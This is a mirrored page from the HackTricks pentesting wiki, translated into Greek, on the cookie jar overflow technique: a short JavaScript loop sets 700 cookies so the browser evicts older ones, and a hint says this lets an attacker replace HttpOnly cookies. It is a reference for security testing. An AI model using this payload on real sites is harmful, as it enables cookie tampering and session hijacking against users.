Mirrors/hacktricks
2
0
Fork 0
mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00
Code Issues Projects Releases Packages Wiki Activity
hacktricks/pentesting-web/hacking-with-cookies/cookie-jar-overflow.md
Translator workflow 35c6b081d2 Translated to Greek
2024-02-10 22:40:18 +00:00

4.4 KiB
Raw Blame History

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks:

Οι περιηγητές έχουν έναν περιορισμό στον αριθμό των cookies που μπορούν να αποθηκεύσουν για μια σελίδα. Έτσι, εάν για κάποιο λόγο χρειάζεστε να εξαφανίσετε ένα cookie, μπορείτε να υπερχειλίσετε τον αποθηκευτή cookie καθώς τα παλαιότερα θα διαγραφούν πριν από αυτό.

// Set many cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i}; Secure`;
}

// Remove all cookies
for (let i = 0; i < 700; i++) {
document.cookie = `cookie${i}=${i};expires=Thu, 01 Jan 1970 00:00:01 GMT`;
}

Προσέξτε ότι τα cookies τρίτων μερών που αναφέρονται σε διαφορετικό τομέα δεν θα αντικατασταθούν.

{% hint style="danger" %} Αυτή η επίθεση μπορεί επίσης να χρησιμοποιηθεί για να αντικαταστήσει τα cookies HttpOnly καθώς μπορείτε να τα διαγράψετε και στη συνέχεια να τα επαναφέρετε με την τιμή που θέλετε.

Ελέγξτε αυτό στο αυτό το άρθρο με ένα εργαστήριο. {% endhint %}

Μάθετε το χάκινγκ του AWS από το μηδέν μέχρι τον ήρωα με το htARTE (HackTricks AWS Red Team Expert)!

Άλλοι τρόποι για να υποστηρίξετε το HackTricks: